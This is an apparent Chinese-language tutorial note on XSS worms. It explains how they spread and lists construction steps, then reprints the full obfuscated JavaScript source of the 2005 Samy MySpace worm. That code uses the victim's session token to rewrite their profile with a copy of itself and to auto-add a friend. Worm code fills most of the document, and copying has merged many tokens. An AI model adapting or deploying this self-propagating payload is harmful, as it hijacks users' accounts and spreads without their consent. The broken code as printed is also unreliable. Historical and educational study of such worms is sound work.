XSS蠕虫

基本概念

XSS蠕虫是指一种具有自我传播能力的XSS攻击,杀伤力很大。引发XSS蠕虫的条件比较高,需要在用户之间发生交互行为的页面,这样才能形成有效的传播。一般要同时结合反射型XSS和存储型XSS。(百度百科)
当xss蠕虫与社会工程学相结合,其危害性将变得十分可怕(用户兴趣点及好奇心)。

原理

1.攻击者发现一个网站存在XSS漏洞,并且可以编写xss蠕虫。
2.利用一个宿主(用户)作为传播源头进行xss攻击。
3.当其他用户访问被感染的内容(页面),xss蠕虫执行以下操作。
A 判断用户是否登录,如果已经登陆就执行下一步,如果没有登录则执行其他操作。
B 继续判断该用户是否被感染,如果没有就感染了他,如果感染了就跳过。

构建过程

1.寻找XSS点
2。实现蠕虫行为
3.收集蠕虫数据
4.传播与感染
参考文章https://bbs.ichunqiu.com/thread-29149-1-1.html?from=db

世界上第一个xss蠕虫病毒(里程碑)

2005年10月4日,第一个web2.0 蠕虫诞生,年仅19岁的samy发起了对myspace.com的xss worm攻击,下附其源代码,实现方法及原理分析参考文章
https://www.freebuf.com/articles/web/19408.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
  <div id=mycode style="BACKGROUND:url('java 
script:eval(document.all.mycode.expr)')"expr="var B=String.fromCharCode(34);varA=String.fromCharCode(39);function g(){varC;try{varD=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return
C}else{return eval('document.body.inne'+'rHTML')}}function
getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){varE=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(varO=0;O<F.length;O++){varI=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;varAS=getQueryParams();varL=AS['Mytoken'];varM=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}functiongetClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}functionparamsToString(AV){var N=new
String();var O=0;for(var P
in AV){if(O>0){N+='&'}varQ=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return
N}function httpSend(BH,BI,BJ,BK){if(!J){return
false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return
true}function findIn(BF,BB,BC){varR=BF.indexOf(BB)+BB.length;varS=BF.substring(R,R+1024);returnS.substring(0,S.indexOf(BC))}functiongetHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';varV=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else
if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=newActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return
Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);varAD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);varAF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF='
but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}varAU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var
AR=getFromURL(AU,'Mytoken');var
AS=new
Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}functionpostHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var
AS=new
Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function
main(){var AN=getClientFID();varBH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}functionprocessxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var
AS=new
Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to
Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function
httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return
false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return
true}"></DIV>